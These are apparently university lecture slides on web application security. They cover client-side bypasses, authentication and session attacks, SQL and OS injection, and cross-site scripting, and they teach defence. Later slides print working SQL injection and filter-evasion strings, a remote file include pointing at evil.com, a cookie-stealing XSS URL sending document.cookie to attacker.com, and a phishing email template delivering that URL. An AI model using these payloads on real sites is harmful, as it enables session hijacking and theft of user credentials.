❑ Social networking (FaceBook, MySpace)

❑ Banking (Citibank)

❑ Web search (Google)

❑ Auctions (eBay)

❑ Gambling

❑ Web mail (Gmail, YahooMail, Hotmail)

❑ Interactive information (Wikipedia)

… The list can go on as long as one bother to add

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 3
Web application security
◼ Why security problems:
❑ New technologies ➔ introduced new possibilities for
exploitation
◼ the most significant battleground between attackers and
people/organization with computer resources and data to defend
❑ False perception of security
◼ “This site is secure”
“This site is absolutely secure. It has been designed to use 128-bit Secure
Socket Layer (SSL/TLS) technology to prevent unauthorized users from
viewing any of your information. You may use this site with peace of mind that
your data is safe with us.”
◼ Users are urged to trust the sites’ security just because of their use of
certificates, SSL/TLS (cryptographic tools) …
◼ In fact, the majority of web applications are insecure, and in ways
that have nothing to do with SSL/TLS.
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 4
Web application security

◼ SSL/TLS is important but


absolutely not everything
we need for security
❑ SSL/TLS is for
confidentiality and integrity
of transmitted data; it is
just like a construction
block not the full house
❑ SLL/TLS do nothing to Some common web vulnerabilities found in
prevent against these sample of 100+ sites -- WebHackerHandbook
vulnerabilities mentioned

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 5
The Core Security Problem:
Users Can Submit Arbitrary Input
◼ Users can interfere with any piece of data
transmitted between the client and the server
❑ request parameters, cookies, and HTTP headers
◼ Users can send requests and can submit
parameters at a patterns different than what the
application developers expects
◼ Users are not restricted to using only a web browser
to access the application.
❑ There are numerous widely available tools that operate
alongside, or independently of, a browser, to help attack
web applications.
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 6
Examples of cheating
◼ Cheating is mainly based on sending input to the server which is
crafted to cause some event that was not expected or desired by
the application’s designer:
❑ Changing the price of a product transmitted in a hidden HTML form
field ➔ purchase the product for a cheaper
❑ Modifying a session token transmitted in an HTTP cookie ➔ hijack
the session of another authenticated user.
❑ Removing certain parameters that are normally submitted ➔ exploit
a logic flaw in the application’s processing.
❑ Altering some input that will be processed by a back-end database
➔ inject a malicious database query ➔ obtain sensitive data
◼ Can SSL/TLS help?
❑ Absolutely Not! SSL does nothing to stop an attacker from
submitting crafted input to the server.

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology
SSL/TLS can’t stop hacker creating
malicious input

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 8
Critical Factors leading to this insecurity

◼ Immature Security Awareness


◼ In-House Development
◼ Deceptive Simplicity
❑ With today’s web dev. tech., even a novice programmer →
powerful app from scratch in a short time.
❑ But, a HUGE difference btw producing code that is
functional and code that is secure
◼ Rapidly Evolving Threat Profile
◼ Resource and Time Constraints
◼ Overextended Technologies

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 9
Core Defense Mechanisms
The defense mechanisms employed by web applications comprise
the following core elements:
◼ Handling user access to the application’s data and functionality
➔ prevent users from gaining unauthorized access.
◼ Handling user input to the application’s functions ➔ prevent
malformed input from causing undesirable behavior.
◼ Handling attackers ➔ the application behaves appropriately
when being directly targeted
❑ Using suitable defensive measures to frustrate the attacker

◼ Managing the application itself


❑ Enabling administrators to monitor its activities and configure its
functionality.

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 10
Hacker’s handbook: Mapping the
application
◼ Mapping the application: The first step in attacking an application
❑ to gather and examine some key information ➔ gain a better
understanding of what you are up against.
◼ Enumerating the application’s content and functionality➔
understand what it actually does and how it behaves.
❑ Much of this functionality will be easy to identify, but some may
be hidden away➔ need some guesswork and luck to discover.
◼ Once obtaining a catalogue of the application’s functionality ➔
closely examine every aspect of application behavior/core
security mechanisms, and the technologies being employed.
❑ ➔ Attackers can identify the key attack surface that the
application exposes: the most interesting areas to target ➔
further subsequent probing to find exploitable vulnerabilities

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 11
Mapping the application: the steps
◼ Analyzing the Application
◼ Enumerating Content and ❑ Identifying Entry Points for
Functionality User Input
❑ Web Spidering ❑ Identifying Server-Side
Technologies
❑ User-Directed Spidering ◼ Banner Grabbing
❑ Discovering Hidden Content ◼ HTTP Fingerprinting
◼ Brute-Force Techniques ◼ File Extensions
◼ Inference from Published ◼ Directory Names
Content
◼ Session Tokens
◼ Use of Public Information
◼ Third-Party Code
◼ Leveraging the Web Server Components
❑ Application Pages vs. ❑ Identifying Server-Side
Functional Paths Functionality
❑ Discovering Hidden ◼ Dissecting Requests
Parameters ◼ Extrapolating Application
Behavior
❑ Mapping the Attack Surface

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 12
HACKER HANDBOOK:
BYPASSING CLIENT-SIDE
CONTROLS

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 13
Hacker Handbook: Bypassing Client-Side
Controls
◼ The core security problem with web applications: clients can submit
arbitrary input
❑ Often web applications rely upon various kinds of measures
implemented on the client side to control the data to be submitted
◼ A fundamental security flaw: the user has full control over the client
and submitted data ➔ can bypass controls implemented on the client
◼ Two major ways in which client-side controls are used to restrict user
input
❑ An app may transmit data via the client component, using some
mechanism that is supposed to prevent user’s modifying data
❑ On gathering data entered by the user, an app may use client-side
controls which handle the contents of that data to be submitted
◼ using HTML form features, client-side scripts, or thick-client technologies.

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 14
Bypassing Client-Side Controls
◼ False expectation and assumption
❑ “It is very common to see an application passing data to the client
in a form that is not directly visible or modifiable by the end user,
in the expectation that this data will be sent back to the server in
a subsequent request. Often, the application’s developers simply
assume that the transmission mechanism used will ensure that
the data transmitted via the client will not be modified along the
way.” – WebHackerHandbook
❑ the assumption that data transmitted via the client will not be
modified is FALSE!
◼ Why such a wrong practice happens so often:
❑ Convenience, easy-to-do for web developers
❑ Repeating known fact to servers: reducing per-session amount
stored at server ➔ better performance
◼ Also helps to deploy load-balanced cluster of servers

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 15
By-passing: Hidden Form Fields
◼ If a field is flagged as hidden, it is not
displayed on-screen.
❑ However, the field’s name and value are
stored within the form and sent back to
the application when the user submits the
form.
◼ But you can easily modify this hidden
field! ◼ The code behind this form is as
❑ Simply saving the source code for the follows:
HTML page, edit the value of the field <form action=”order.asp” method=”post”>
❑ reload the source into a browser, and <p>Product: Sony VAIO A217S</p>
click the Buy button. <p>Quantity: <input size=”2”
◼ But better use an intercepting proxy to name=”quantity”>
modify the desired data on the fly. <input name=”price” type=”hidden”
❑ Burp Proxy (part of Burp Suite) value=”1224.95”>
❑ WebScarab <input type=”submit” value=”Buy!”></p>
❑ Paros </form>
◼ The proxy is placed between your web ◼ Modify the hidden price and you
browser and the target application can buy for cheaper amount!
❑ It can intercept every request issued to
the application, and every response
received back, for both HTTP and HTTPS

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 16
Capturing User Data: HTML Form

◼ Forms can be used to impose restrictions i.e.


perform validation checks on the user-supplied
data.
➔ these client-side controls are used as a security
mechanism to defend itself against malicious input,

◼ However, the controls can usually be trivially


circumvented ➔ leaving the application
potentially vulnerable to attack.

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 17
Length limits
◼ Eg. the browser prevent user from entering >3 digits in the
quantity field ➔ serve-side may assume that the quantity
parameter always <1000
<form action=”order.asp” method=”post”>
<p>Product: Sony VAIO A217S</p>
<p>Quantity: <input size=”2” maxlength=”3” name=”quantity”>
<input name=”price” type=”hidden” value=”1224.95”>
<input type=”submit” value=”Buy!”></p>
</form>

◼ But malicious user can easily defeat then take advantage of


❑ Submit data that is longer than this length but that is still valid in other
respects ➔ If the application accepts the overlong data➔ infer that
the length limit validation is not replicated on the server.
❑ Hacker may be able to leverage the defects in validation to exploit
SQL injection, cross-site scripting, or buffer overflows
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 18
Hacker Handbook: Bypassing Client-Side
Controls Capturing User Data: Thick- ◼
Client Components
◼ Transmitting Data via the ❑ Java Applets
Client 95 ❑ Decompiling Java Bytecode
❑ Hidden Form Fields ❑ Coping with Bytecode
❑ HTTP Cookies Obfuscation
❑ URL Parameters ❑ ActiveX Controls
❑ The Referer Header 1 ◼ Reverse Engineering
❑ Opaque Data ◼ Manipulating Exported Functions
◼ Fixing Inputs Processed by
❑ The ASP.NET ViewState Controls
◼ Capturing User Data: HTML ◼ Decompiling Managed Code
Forms ◼ Shockwave Flash Objects
❑ Length Limits ◼ Handling Client-Side Data
❑ Script-Based Validation Securely
❑ Disabled Elements ❑ Transmitting Data via the Client
❑ Validating Client-Generated Data
❑ Logging and Alerting

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 19
Capturing User Data: Thick-Client
Components
◼ Another way for capturing, validating, and
submitting user data
❑ The technologies most likely to encounter: Java
applets, ActiveX controls, and Shockwave Flash
objects

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 20
Java
applets ◼ the applet tag instructs the browser to load a Java applet from the
specified URL and instantiate it with the name TheApplet
◼ the user clicks the Play button, a JavaScript routine executes that
invokes the getScore method of the applet
<script> ◼ This is when the actual game play takes place, after which the score is
function play() displayed in an alert dialog.
{
alert(“you scored “ + TheApplet.getScore());
The script then invokes the getObsScore
document.location = “submitScore.jsp?score=” +
method of the applet, and submits the
TheApplet.getObsScore() + “&name=” +
returned value as a parameter to the
document.playForm.yourName.value;
submitScore.jsp URL, together with the
}
name entered by the user
</script>
<form name=playForm>
<p>Enter name: <input type=”text” name=”yourName” value=”“></p>
<input type=”button” value=”Play” onclick=JavaScript:play()>
</form>
<applet code=”https://wahh-game.com/JavaGame.class”
id=”TheApplet”></applet>

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 21
Obfuscation & decompiling
◼ Example: playing the game results in a dialog like
this, then followed by a request for a URL with this
form:
❑ https://wahh-game.com/submitScore.jsp?score=
c1cc3139323c3e4544464d51515352585a61606a6b&name
=daf
◼ Obfuscation:
◼ The long string that is returned by the getObsScore method, and
submitted in the score parameter.
◼ Want to cheat the game? Submit an arbitrary high score? ➔ need
know how to correctly obfuscate your chosen score, i.e. decoded in the
way by the server. ➔ Reverse engineering is possible but difficult!
◼ Decompiling Java bytecode: decompile the applet to obtain its source
code. Java bytecode can be decompiled to recover its original source code

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 22
Handling Client-Side Data Securely
◼ The core security problem with web applications arises because client-
side components and user input are outside of the server’s direct
control.
❑ The client, and all of the data received from it, is inherently untrustworthy.
◼ Transmitting Data via the Client
❑ applications should avoid transmitting critical data (e.g. product prices and
discount rates) via the client.
❑ Often, it is possible to hold such data on the server, and reference it
directly from server-side logic
◼ Validating Client-Generated Data: Data generated on the client and
transmitted to the server cannot in principle be validated securely on the client
❑ Lightweight controls like HTML form fields JavaScript can be trivially circumvented
❑ Thick-client components merely slow down an attacker for a short period
❑ Obfuscated client-side code provides additional obstacles, but still could be
overcame by a determined attacker

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 23
HACKER HANDBOOK:
ATTACKING
AUTHENTICATION

24
Attacking Authentication

◼ Authentication Technologies
❑ HTML-forms
❑ Multi-factor mechanisms (e.g. passwords and
physical tokens)
❑ Client SSL certificates and smartcards
❑ Windows-integrated authentication
❑ Kerberos
❑ Authentication services

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 25
Design flaws
◼ Poorly chosen passwords
❑ Attack: discover password policies by trying registering several
accounts then changing passwords
❑ Brute-Forcible login
◼ the allowed number of login attempts can be found in cookies
◼ Poorly chosen usernames
❑ Could be Email addresses, and other easily guessable ones
◼ Verbose Failure Messages
❑ Can be used to guess username: different messages depending on
if username /password is invalid (difference might be small)
❑ Another factor is difference in timing (delay in respose from server)
➔ Hack steps:
❑ Monitor your own login session with tools as wireshark/web proxy
◼ Generate a list of (u-name, password) then automate a brute-force attack
❑ If login form is loaded using http➔ vulnerable to man-in-the-middle
attack
◼ even if the authentication itself is protected by HTTPS
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 26
Design flaws
◼ “Forgotten password” functionality
❑ Often not well tested
❑ Secondary challenges are much easier to guess
◼ User-set secret question/Password hints set by user:
usually easy ones, could be trivial
◼ Authentication information sent to an email address
specified in password recovery procedure
◼ “Remember me” functionality
❑ Insecure implementation
◼ E.g. RememberUser=“PeterGell”
◼ Simple persistent cookie
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 27
Design flaws
◼ User impersonation functionality
❑ Used by system to allow administrator to impersonate normal
users
❑ Could be implemented as a “hidden” function such as
/admin/ImpersonateUser.php
❑ Could trust user controllable data such as a cookie
◼ Non-unique user names (rare but observed in
the wild)
❑ Application might or might not enforce different passwords
❑ Hack steps: register multiple names with the same user name
with different passwords
❑ Monitor for behavior differences when the password is already
used
❑ This allows attacks on frequent usernames

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 28
Attacking Authentication

◼ Predictable Initial Password


❑ Commonly known passwords:
◼ Common practice in schools is to use the student id numbers
❑ Hack steps: Try to obtain several passwords in quick
succession to see whether they change in a predictable
way
◼ Insecure Distribution of Credentials
❑ Typically distributed out of band such as email
❑ If there is no requirement to change passwords➔ capturing
messages / message archives yields valid credentials

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 29
Attacking Authentication

◼ Logic flaws in multistage login mechanisms


❑ Mechanisms provide additional security by adding
additional checks
❑ Logic flaws are simpler to make: attack the logics of
control flow and data consistence between stages
◼ Hacking steps:
❑ Monitor successful login
❑ Identify distinct stages and the data requested
❑ Repeat the login process with various malformed requests
❑ Check whether all demanded information is actually processed
❑ Check for client-side data that might reflect successful passing
through a stage

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 30
Attacking Authentication

◼ Insecure Storage of Credentials


❑ Often stored in unsecured form in a database
❑ Targets of sql injection attacks or authentication
weaknesses

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 31
ATTACKING SESSION
MANAGEMENT

32
Session Management

◼ The session management mechanism is a fundamental


security component in the majority of web applications,
which enables the application
❑ to uniquely identify a given user across a number of different requests
❑ to handle the data that it accumulates about the state of that user’s
interaction with the application.
◼ If an attacker can break an application’s session
management
❑ she can effectively bypass its authentication controls
❑ masquerade as other users without knowing their credentials.

If an attacker compromises an administrative user in this way, then the


attacker can own the entire application.
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 33
Why Session
◼ Why session
❑ Users do not want to have to reenter their password on every single
page of the application
◼ Implementing sessions
❑ Issue each user with a unique session token or identifier
❑ On each subsequent request to the application, the user resubmits this
token, enabling the application to determine which sequence of earlier
requests the current request relates to.
❑ HTTP cookies as the mechanism for passing these session tokens between
server and client
◼ E.g. the server’s first response to a new client contains an HTTP header
Set-Cookie: ASP.NET_SessionId=mza2ji454s04cwbgwb2ttj55
◼ and subsequent requests from the client contain the header:
Cookie: ASP.NET_SessionId=mza2ji454s04cwbgwb2ttj55

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 34
Session Management and Weakness
◼ Sessions need to store state
◼ Performance dictates to store state at client
❑ Cookies
❑ Hidden forms
◼ Asp.net view state (Not a session)
❑ Fat URL
❑ HTTP authentication (Not a session)
❑ All or combinations, which might vary within a different state
◼ Weaknesses usually come from
❑ Weak generation of session tokens
❑ Weak handling of session tokens
◼ Hacker needs to find used session token
❑ Find session dependent states and disfigure token
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 35
Weaknesses in Session Token Generation
◼ Meaningful tokens
❑ Might be encoded in hex, base-64, …
❑ Might be trivially encrypted (e.g. with XOR encryption)
❑ Leak session data information
❑ If not cryptographically protected by a signature, allow simple
alteration
◼ Hacking Steps:
❑ Obtain a single token and systematically alter it, observing the effect
on the interaction with the website
❑ Log-in as several users, at different times, … to record and analyze
differences in tokens
❑ Analyze tokens for correlation related to state information such as
user names
❑ Test reverse engineering results by accessing site with artificially
created tokens.

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 36
Predictable tokens

◼ Most brazen weakness: sequential session ids


◼ Typical weaknesses:
❑ Concealed sequences
◼ Such as adding a constant to the previous value
❑ Time dependencies
◼ Such as using Unix, Windows NT time
❑ Weak random number generation
◼ E.g. Use NIST FIPS-140-2 statistical tests to discover
◼ Use hacker tools such as Stompy

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 37
Weaknesses in Session Token Handling

◼ Disclosure of Tokens on the Network


❑ not all interactions are protected by HTTPS
◼ Common scenario: Login, account update uses https, the rest or part
(help pages) of the site not.
◼ Use of http for pre-authenticated areas of the site such as front page,
which might issue a token
❑ Cookies can be protected by the “secure” flag
◼ Disclosure of Tokens in
❑ Logs of User browser/Web server/corporate or ISP proxy
servers/reverse proxies
❑ Referer logs of any servers that user visit by following off-site links
◼ Example: Firefox 2.? Includes referer header provided that the off-site is
also https. This exposes data in URLs

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 38
Weaknesses in Session Token Handling

◼ Multiple valid tokens concurrently assigned to the same


user / session
❑ Existence of multiple tokens is an indication for a security breach
◼ Of course, user could have abandoned and restarted a session

◼ “Static Tokens”
❑ Same token reissued to user every time
◼ A poorly implemented “remember me” feature

◼ Other logic defects:


❑ A token consisting of a user name, a good randomized string that
never used / verified the random part, …

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 39
Weaknesses in Session Token Handling

◼ Client exposure to Token Hijacking


❑ XSS attacks query routinely user’s cookies
❑ Session Hijacking:
◼ Session Fixation Vulnerability:
❑ Attacker feeds token to the user, waits for them to login, then
hijacks the session
◼ Cross-Site Request Forgeries
❑ Attacker crafts request to application
❑ Incites user to send request
❑ Relies on token being sent to site

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 40
Securing Session Management

◼ Generate Strong Tokens


❑ Uses crypto
❑ Uses cryptogr. strong random number generator
◼ Protect Tokens throughout their Lifecycle
❑ Transmit tokens only over https
❑ Do not use URL to transmit session tokens
❑ Implement logout functionality
❑ Implement session expiration
❑ Prevent concurrent logins
❑ Beware of / secure administrative functionality to view
session tokens
❑ Beware of errors in setting cookie domains and paths
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 41
Securing Session Management
◼ Prevent Cross-Site Scripting vulnerabilities
◼ Check tokens submitted
◼ If warranted, require two-step confirmation and / or
reauthentication to limit effects of cross-site request forgeries
❑ Consider per-page tokens

◼ Create a fresh session after successful authentication to limit


effects of session fixation attacks
❑ This is particularly difficult, if sensitive information is submitted,
but user does not authenticate
◼ Log, Monitor, Alert
◼ Implement reactive session termination

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 42
CODE INJECTION

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 43
Code Injection

◼ Hacking steps:
❑ Supply unexpected syntax to cause problems
❑ Identify any anomalies in the application response
❑ Examine any error messages
❑ Systematically modify input that causes
anomalous behavior to form and verify
hypotheses on the behavior of the system
❑ Try safe commands to prove existence of injection
flaw
❑ Exploit the flaw
Code Injection Into SQL
◼ Gain knowledge of SQL
❑ Install same database as used by application on local server to test SQL
commands
❑ Consult manuals on error messages
◼ Detection:
❑ Cause an error condition:
◼ String Data
❑ Submit a single quotation mark
❑ Submit two single quotation marks
❑ Use SQL concatenation characters
▪ ‘ | | ‘ FOO (oracle)
▪ ‘ + ‘ FOO (MS-SQL)
▪ ‘ ‘ FOO (No space between quotation marks) (MySQL)
◼ Numeric Data
❑ Replace numeric value with arithmetic (Instead of 5, submit 2+3)
❑ Use sql-specific keywords
▪ 67-ASCII(‘A’) is equivalent to 2 in SQL
❑ Beware of special meaning of characters in http such as ‘&’, ‘=‘, …
Detection
◼ Cause an error condition:
❑ Select / Insert Statements
◼ Entry point is usually ‘where’ clause, but ‘order by’ etc.
might also be injected
◼ Example: admin’ or 1==1
❑ Example injections into user name field for injection
into insert, where we do not know the number of
parameters:
◼ foo ’)--
◼ foo ‘ , 1) –
◼ foo ‘ , 1 , 1) –
◼ foo ‘ , 1 , 1 , 1) –
❑ Here we rely on 1 being cast into a string.
Union operator
◼ Usual:
SELECT author, title, year FROM books WHERE publisher = ‘Wiley’

◼ Fake by inserting the input below


Wiley’ UNION SELECT username, password, uid FROM users--
That is to obtain
SELECT author, title, year FROM books WHERE publisher = ‘Wiley’
Union SELECT username, password, uid FROM users--’

◼ Should look at error messages in order to


reformulate the string more successfully
❑ ‘ UNION SELECT NULL- -’
❑ ‘ UNION SELECT NULL, NULL--
❑ ‘UNION SELECT NULL, NULL, NULL --
Union operator

◼ Find out how many rows are in the table:


❑ ORDER BY 1 --
❑ ORDER BY 2 --
❑ ORDER BY 3 –
◼ Find out which columns have the string data
type
❑ UNION SELECT ‘a’, NULL, NULL--
❑ UNION SELECT NULL, ‘a’, NULL--
❑ UNION SELECT NULL, NULL, ‘a’--
Fingerprinting the database
◼ Why fingerprinting:
❑ Important because of differences in SQL supported
◼ E.g.: Oracle SQL requires a from clause in all selects
◼ How
❑ Obtain version string of database from
◼ UNION SELECT banner,NULL,NULL from v$version
❑ Try different ways of concatenation
◼ Oracle: ‘Tho’||’mas’
◼ MS-SQL: ‘Tho’+’mas’
◼ MySQL: ‘Tho’ ‘mas’ (with space between quotes)
❑ Different numbering formats
◼ Oracle: BITAND(1,1)-BITAND(1,1)
◼ MS-SQL: @@PACK-RECEIVED-@@PACK_RECEIVED
◼ MySQL: CONNECTION_ID() - CONNECTION_ID()
MS-SQL: Exploiting ODBC Error
Messages
◼ Inject
‘ having 1=1 –
❑ Generates error message

◼ Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’ (Microsoft)


[ODBC SQL Server Driver] [SQL Server] Column ‘users.ID’ is invalid in the
select list because it is not contained in an aggregate function and there is no
GROUP BY clause

◼ Inject
‘ group by users.ID having 1=1 –
❑ Generates error message
◼ Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’ (Microsoft)
[ODBC SQL Server Driver] [SQL Server] Column ‘users.username’ is invalid
in the select list because it is not contained in an aggregate function and there
is no GROUP BY clause
MS-SQL: Exploiting ODBC Error
Messages
◼ Inject
◼ ‘ group by users.ID, users.username, users.password,
users.privs having 1=1 --
❑ Generates no error message
❑ No proceed injecting union statements to find data
types for each column
❑ Inject
◼ ‘ union select sum(username) from users--’
By-passing filters

◼ Avoiding blocked characters


❑ The single quotation mark is not required for
injecting into a numeric data field
❑ If the comment character is blocked, craft injection
so that it does not break the surrounding query
◼ ‘ or 1 = 1 -- ➔ ‘ or ‘a’ = ‘ a
❑ MS-SQL does not need semicolons to separate
several commands in a batch
By-passing filters
◼ Circumventing simple validation
❑ If a simple blacklist is used, attack canonicalization and validation.
❑ E.g. instead of select, try
◼ SeLeCt
◼ SELSELECTECT
◼ %53%45%4c%45%43%54
◼ %2553%2545%254c%2545%2543%2554

◼ Use inline comments


❑ SEL/*foo*/ECT (valid in MySQL)
◼ Manipulate blocked strings
❑ ‘adm’| |’in’ (valid in Oracle)
◼ Use dynamic execution
❑ exec(‘select * from users’) works in MS-SQL
By-passing filters
◼ Exploit defective filters
❑ Example: Site defends by escaping any single
quotation mark
◼ I.e.: Replace ‘ with ‘’
❑ Assume that user field is limited to 20 characters
◼ Inject
❑ aaaaaaaaaaaaaaaaaaa’
◼ Application replaces this with
❑ aaaaaaaaaaaaaaaaaaa’’
◼ Passes it on to database, which shortens it to 20
characters, removing the final single quotation mark
◼ Therefore, inject
❑ aaaaaaaaaaaaaaaaaaa’ or 1=1 --
Second Order SQL Injection

◼ The result of an SQL statement is posted in


another sql statement
❑ Canonicalization is now much more difficult
Code Injection: OS Injection

◼ Two types:
❑ Characters ; | & newline are used to batch
multiple commands
❑ Backtick character ` used to encapsulate
speparate commands within a data item
◼ Use time delay errors
❑ Use ‘ping’ to the loop-back device
◼ | | ping -I 30 127.0.0.1 ; x | | ping -n 30 127.0.0.1 &
❑ works for both windows and linux in the absence
of filtering
OS Injection
◼ Dynamic execution in php
❑ uses eval
◼ Dynamic execution in asp
❑ uses evaluate
◼ Hacking steps to find injection attack:
❑ Try
◼ ;echo%2011111111
◼ echo%201111111
◼ response.write%201111111
◼ :response.write%201111111
❑ Look for a return of 1111111 or an error message
OS Injection

◼ Remote file injection


❑ PHP include accepts a remote file path
◼ Example Fault:
https://bobadilla.engr.scu.edu/main.php?Country=FRG
is processed as
❑ $country = $_GET[‘Country’];
❑ include( $country. ‘.php’ );
❑ which loads file: FRG.php
❑ Attacker injects
▪ https://bobadilla.engr.scu.edu/main.php?Country=http://evil.co
m/backdoor
◼ Found by putting attacker’s resources, or non-
existing IP, or static resource on victim’s site, …
Code Injection: OS Injection

◼ Soap Injection
◼ XPath injection
◼ SMTP injection
◼ LDAP injection
Attacking other users: XSS

◼ XSS attacks
❑ Vulnerability has wide range of consequences,
from pretty harmless to complete loss of
ownership of a website
ATTACKING OTHER USERS:
CROSS-SITE SCRIPTING (XSS)

Network Security by Van K Nguyen 61


Sep 2010 Hanoi University of Technology 61
Reflected XSS
◼ User-input is reflected to web page
❑ Common vulnerability is reflection of input for an
error message
◼ Exploitation:
Attacker hijacks user’s session

Server
User logs
responds
in with
User requests attacker’s
attacker’s Javascript
URL

User’s browser
Attacker feeds sends
craftedsession
URL
token to attacker
Reflected XSS
◼ Exploit:
1. User logs on as normal and obtains a session cookie
2. Attacker feeds a URL to the user
◼ https://bobadilla.engr.scu.edu/error.php?message=<script>var+i=n
ew+Image;+i.src=“http://attacker.com/”%2bddocument.cookie;</scr
ipt>
3. The user requests from the application the URL fed to them by
the attacker
4. The server responds to the user’s request; the answer contains
the javascript
5. User browser receives and executes the javascript
◼ var I = new Image; i.src=http://attacker.com/+document.cookie
6. Code causes the user’s browser to make a request to
attacker.com which contains the current session token
7. Attacker monitors requests to attacker.com and captures the
token in order to be able to perform arbitrary actions as the
user
Reflected XSS

◼ Same Origin Policy: Cookies are only returned to the


site that set them.
❑ Same Origin Policy:
◼ Page residing in one domain can cause an arbitrary request to
be made to another domain.
◼ Page residing in one domain can load a script from another
domain and execute it in its own context
◼ A page residing in one domain cannot read or modify cookies
(or other DOM data) belonging to another domain
◼ For browser, the attacker’s javascript came from the
site
❑ It is executed within the context of the site
How to feed a tricky URL

From: Thomas Schwarz <tschwarz@bobadilla.engr.scu.edu>


To: John Doe
Subject: Complete online course feed-back form
Dear Valued Student
Please fill out the following online course feed-back form. Your grades
will not be released to the registrar without having completed this form.
Please go to my course website using your usual bookmark and then
click on the following link:
https://bobadilla.engr.scu.edu/%65%72%72%6f%72?message%3d%3c%
73%63%72ipt>var+i=ne%77+Im%61ge%3b+i.s%72c=“ht%74%70%3a%2f
Stored XSS Vulnerability

Attacker hijacks user’s session


User logs
Server in andwith
responds views
Attacker’s Javascript
attackers
attacker’s question
Javascript Attacker submits question
executes in user’s containing malicious
browser Javascript

User’s browser sends session


token to attacker
DOM-based XSS

◼ A user requests a crafter URL supplied by the


attacker and containing embedded Javascript
◼ The server’s response does not contain the
attacker’s script in any form
◼ When the user’s browser processes this
response, the script is nevertheless
executed.
The case of MySpace, 2005
◼ User Samy circumvented anti-XSS filters installed to
prevent users from placing JavaScript in their user profile
pages
◼ Script executed whenever user saw Samy’s page
❑ Added Samy into “friends” list
❑ Copied itself into the victim’s page
◼ MySpace had to take the application offline, remove
malicious script from the profiles of their users, and fix
the defect
◼ Samy was forced to pay restitution and carry out three
months of community service
XSS Payloads
◼ Virtual Defacement
❑ Content of host is not affected, but loaded from
other sites
◼ Injecting Trojan Functionality
❑ “Google is moving to a pay to play model” proof of
concept created by Jim Ley, 2004
◼ Inducing User Actions
❑ Use payload script to perform actions
◼ Exploit Any Trust Relationships
XSS Payloads
Other payloads for XSS
◼ Malicious web site succeeded in the past to:
❑ Log Keystrokes
❑ Capture Clipboard Contents
❑ Steal History and Search Queries
❑ Enumerate Currently Used Applications
❑ Port Scan the Local Network
❑ Attack Other Network Hosts
◼ <img src=http://192.168.1.1/hm_icon.gif”
onerror=“notNetgear()”
◼ This checks for the existence of a unique image that is
present if a Netgear DSL router is present
◼ And XSS can deliver those things, too
Delivery Modes
◼ Reflected and DOM-based XSS attacks
❑ Use forged email to target users
❑ Use text messages
❑ Use a “third party” web site to generate requests that
trigger XSS flaws.
◼ This is successful if the user is logged into the vulnerable
site and visits the “third party” web site at the same time.
◼ Attackers can pay for banner ads that link to a URL
containing an XSS payload for a vulnerable application
❑ Use the “tell a friend” or “tell administrator” functionality
in order to generate emails with arbitrary contents and
recipients
Delivery Modes

◼ Stored XSS attacks


❑ Look for user controllable data that is displayed:
◼ Personal information fields
◼ Names of documents, uploaded files, …
◼ Feedback or questions for admins
◼ Messages, comments, questions, …
◼ Anything that is recorded in application logs and
displayed in a browser to administrators:
❑ URLs, usernames, referer fields, user-agent field contents,

Finding Vulnerabilities
◼ Standard proof-of-concept attack strings
“><script>alert(document.cookie)</script>
❑ String is submitted as every parameter to every page of the
application
◼ Rudimentary black-list filters
❑ Look for expressions like “<script>”, …
❑ Remove or encode expression, or block request altogether
❑ Counterattack:
◼ Use exploits without the <script> or even “ < > / characters
❑ Examples:
◼ “><script > alert(document.cookie)</script >
◼ “><ScRiPt>alertalert(document.cookie)</ScRiPt >
◼ “%3e%3cscript%3ealert(document.cookie)%3c/script%3e
◼ “><scr<script>ipt> alert(document.cookie)</scr</script>ipt>
◼ %00”>script>alert(document.cookie)</script>
Finding Reflected XSS Vulnerabilities
◼ Look for input string that is reflected back to user
❑ should be unique and easily searchable: “Crubbardtestoin”
❑ Submit test string as every parameter using every method, including
HTTP headers
◼ Review the HTML source code to identify the location of the
test string
◼ Change the test string to test for attack possibilities
❑ XSS bullets at ha.ckers.org
❑ Signature based filters (e.g. ASP.NET anti-XSS filters) will mangle
reflection for simple attack input, but
◼ Often overlook: whitespaces before or after tags, capitalized letters, only
match opened and closed tags,
❑ Data Sanitization
